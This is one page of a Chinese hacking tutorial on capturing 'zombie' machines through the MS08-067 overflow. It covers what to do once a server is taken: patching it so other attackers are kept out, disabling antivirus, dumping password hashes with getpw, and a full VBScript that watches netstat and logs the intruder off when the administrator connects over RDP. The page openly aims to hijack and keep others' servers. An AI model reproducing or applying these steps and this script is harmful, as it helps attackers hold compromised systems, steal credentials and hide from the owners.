WEB开发网
开发学院网络安全安全技术 利用MS08067远程溢出漏洞抓肉鸡 阅读

利用MS08067远程溢出漏洞抓肉鸡

 2008-12-02 13:34:46 来源:WEB开发网   
核心提示: 10.加固服务器打江山容易,守江山难,利用MS08067远程溢出漏洞抓肉鸡(6),一旦成功攻克服务器后,先对计算机的安全状况和安全措施进行查看和了解,当管理员登录后,脚本会自动注销当前登录用户,根据个人经验先进行简单加固,如图10所示

10.加固服务器

打江山容易,守江山难,一旦成功攻克服务器后,先对计算机的安全状况和安全措施进行查看和了解。根据个人经验先进行简单加固,如图10所示,就地取材,看看系统有什么杀毒软件,有无360卫士等,对系统的补丁进行修复,删除其它木马程序等。在本案例中,利用瑞星的漏洞扫描程序对系统的漏洞进行扫描,然后进行修复。

利用MS08067远程溢出漏洞抓肉鸡

图10 扫描系统漏洞并修复

注意:

(1)如果系统安装有瑞星等杀毒软件,使用getpw获取系统帐号会失败的,这个时候就想办法开放服务器的远程终端,登录系统后,禁用杀毒软件,然后使用getpw获取系统的Hash密码。Getpw获取密码的格式为“getpw $local”,获取Hash密码一定要在shell中,否则获取的Hash密码为空,将获取的值复制到Txt文件中,并去除内容中的空格,正确的格式如图11所示。

利用MS08067远程溢出漏洞抓肉鸡

图11 获取的密码Hash值

(2)如果被溢出服务器已经开放3389,则登录后要注意管理员是否在线,以前网上有过批处理脚本,当管理员登录后,脚本会自动注销当前登录用户,感谢俺的好友“孤水绕城”提高了这样一个脚本,即:

on error resume nextset arg=wscript.arguments
If arg.count=0 then
wscript.echo "use:// cscript.exe FS.vbs port"
sleep 1000
wscript.quit
End If
Tport=arg(0)
Runs=false
While runs=false
Dim oShell,oExec,strOut,oRegExp,Matches,Match,Num,Tport
Set oShell = WScript.CreateObject("WScript.Shell")
Set oExec = oShell.Exec("netstat -an")
Set oRegExp = new RegExp
oRegExp.Pattern = "TCP[s]+[d.]+:"&Tport&"[s]+[d.]+:[d]+[s]+ESTABLISHED"
oRegExp.IgnoreCase = True
oRegExp.Global = True
Do While Not oExec.StdOut.AtEndOfStream
strOut = strOut & oExec.StdOut.ReadLine() & Chr(13) & Chr(10)
Loop
Set Matches = oRegExp.Execute(strOut)
Num = 0
For Each Match In Matches
Num = Num + 1
Next
if num > 1 then
Runs=true
oShell.run "logoff"
end if
Set Matches = Nothing
Set oRegExp = Nothing
Set oExec = Nothing
Set oShell = Nothing
Wend

11.破解Hash值

上一页  1 2 3 4 5 6 7  下一页

Tags:利用 MS 远程

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接